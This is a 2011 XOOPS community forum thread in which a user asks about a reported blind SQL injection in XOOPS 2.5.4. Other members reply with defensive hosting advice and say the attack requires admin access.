xoops forums

edipinho

Just popping in
Posted on: 2011/12/27 22:30
edipinho
edipinho (Show more)
Just popping in
Posts: 84
Since: 2003/10/15
#1

Xoops 2.5.4 Blind SQL Injection

Blind SQLI Xoops 2.5.4 Xoops Protector Bypass day 0

I am layman in this matter, is this really true?





And if it is how we can avoid the attack.

dbman

Friend of XOOPS
Posted on: 2011/12/27 23:10
dbman
dbman (Show more)
Friend of XOOPS
Posts: 171
Since: 2005/4/28
#2

Re: Xoops 2.5.4 Blind SQL Injection

Move your data folders outside of web root and ensure that your host has something like mod security installed on the web server.

edipinho

Just popping in
Posted on: 2011/12/27 23:38
edipinho
edipinho (Show more)
Just popping in
Posts: 84
Since: 2003/10/15
#3

Re: Xoops 2.5.4 Blind SQL Injection

Thanks for the super quick response.
I already do all this data security behind the webroot, so I'm safe?

Mamba

Moderator
Posted on: 2011/12/28 6:36
Mamba
Mamba (Show more)
Moderator
Posts: 10308
Since: 2004/4/23
#4

Re: Xoops 2.5.4 Blind SQL Injection

My understanding is that as long as you don't give your Admin access to a hacker, you're safe.

You need to be an Admin, to take advantage of this attack.

If you look at the video, you see that he is logging in as an Admin first....

I assume that the Core team will provide a fix for XOOPS 2.5.5, but again - it is a "low level" issue, so no reason for a major worry.
Please support XOOPS & DONATE
Use 2.5.8 | Debug | Requests | Bugs

edipinho

Just popping in
Posted on: 2011/12/28 20:34
edipinho
edipinho (Show more)
Just popping in
Posts: 84
Since: 2003/10/15
#5

Re: Xoops 2.5.4 Blind SQL Injection

Thanks for the reply, I had sensed that he was as an administrator, but as I lay, I thought it was serious.
Whenever I follow the recommendations of you and never had any kind of invasion.

Once again thank you.

wishcraft

Module Developer
Posted on: 2011/12/28 22:12
wishcraft
wishcraft (Show more)
Module Developer
Posts: 3660
Since: 2007/5/18
#6

Re: Xoops 2.5.4 Blind SQL Injection

I suggest you also run Xortify 3.0, this normally sort of attack is done by a bot, not a person and the honeypots will be preaware of their IP and block them.

Simon
Resized Image
www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/Cipherhouse
sourceforge.net/projects/chronolabs/
facebook.com/mynamesnot